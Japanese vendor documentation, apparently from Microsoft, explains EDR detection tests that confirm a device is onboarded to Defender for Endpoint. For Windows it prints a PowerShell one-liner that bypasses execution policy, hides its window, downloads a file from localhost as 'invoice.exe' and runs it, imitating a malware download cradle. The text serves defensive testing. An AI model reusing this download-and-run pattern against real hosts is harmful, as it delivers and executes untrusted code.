デバイスのオンボードおよびレポート サービスを検証するための EDR 検出テスト

適用対象:

シナリオの要件とセットアップ

  • Windows 11、Windows 10 バージョン 1709 ビルド 16273 以降、Windows 8.1、または Windows 7 SP1。
  • Windows Server 2022、Windows Server 2019、Windows Server 2016、Windows Server 2012 R2、および Windows Server 2008 R2 SP1。
  • Linux
  • macOS
  • Microsoft Defender for Endpoint
  • Linux 用 Microsoft Defender for Endpoint
  • macOS 用 Microsoft Defender for Endpoint

エンドポイントのエンドポイント検出と応答は、ほぼリアルタイムで実用的な高度な攻撃検出を提供します。 セキュリティ アナリストは、効率的にアラートの優先順位を設定し、違反の全容を可視化して、脅威に対処する対応策を講じることができます。

EDR 検出テストを実行して、デバイスが適切にオンボードされ、サービスに報告されていることを確認します。 新しくオンボードされたデバイスで次の手順を実行します。

Windows

  1. コマンド プロンプト ウィンドウを開く

  2. プロンプトで、次のコマンドをコピーして実行します。 コマンド プロンプト ウィンドウは自動的に閉じます。

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
  1. 成功した場合、検出テストは完了としてマークされ、数分後に新しいアラートが表示されます。

Linux

  1. オンボードされた Linux サーバーに スクリプト ファイル をダウンロードする
curl -o ~/Downloads/MDE Linux DIY.zip https://aka.ms/LinuxDIY
  1. zip を抽出する
unzip ~/Downloads/MDE Linux DIY.zip
  1. 次のコマンドを実行します。
./mde_linux_edr_diy.sh

数分後、Microsoft Defender XDRで検出を発生させる必要があります。

  1. アラートの詳細、マシンのタイムラインを確認し、一般的な調査手順を実行します。

macOS

  1. ブラウザーの Microsoft Edge for Mac または Safari で、 MDATP MacOS DIY.ziphttps://aka.ms/mdatpmacosdiy ダウンロードして抽出します。

    次のプロンプトが表示されます。

    "mdatpclientanalyzer.blob.core.windows.net" でダウンロードを許可しますか?
    [Web サイトの基本設定] でファイルをダウンロードできる Web サイトを変更できます。

  2. [許可] をクリックします。

  3. [ダウンロード] を開きます。

  4. MDATP MacOS DIY を表示できる必要があります。

    ヒント

    MDATP MacOS DIY をダブルクリックすると、次のメッセージが表示されます。

    開発者が検証ツールにできないため、"MDATP MacOS DIY" を開くことができません。
    macOS は、このアプリがマルウェアから解放されていることを確認できません。
    [ごみ箱に移動][キャンセル]

  5. [ キャンセル] をクリックします。

  6. MDATP MacOS DIY を右クリックし、[開く] をクリックします。

    次のメッセージが表示されます。

    macOS は MDATP MacOS DIY の開発者を検証できません。 開いてよろしいですか?
    このアプリを開くと、コンピュータや個人情報をMacに害を与えたりプライバシーを侵害したりする可能性のあるマルウェアに公開できるシステムセキュリティをオーバーライドすることになります。

  7. [ 開く] をクリックします。

    次のメッセージが表示されます。

    Microsoft Defender for Endpoint - macOS EDR DIY テスト ファイル
    対応するアラートは、MDATP ポータルで使用できます。

  8. [ 開く] をクリックします。

    数分後に、 アラート macOS EDR テスト アラート が発生します。

  9. Microsoft Defender ポータル (https://security.microsoft.com/) に移動します。

  10. [アラート キュー] に移動します。

    重大度、カテゴリ、検出ソース、およびアクションの折りたたまれたメニューを示す macOS EDR テスト アラートを示すスクリーンショット

    macOS EDR テスト アラートには、重大度、カテゴリ、検出ソース、および折りたたまれたアクションのメニューが表示されます。

    アラートの詳細とデバイスのタイムラインを確認し、定期的な調査手順を実行します。

実行を検討できる次の手順は、アプリケーションの互換性またはパフォーマンスのために必要に応じて AV 除外を追加することです。

Microsoft Defender for Endpointセキュリティ運用ガイドを参照してください。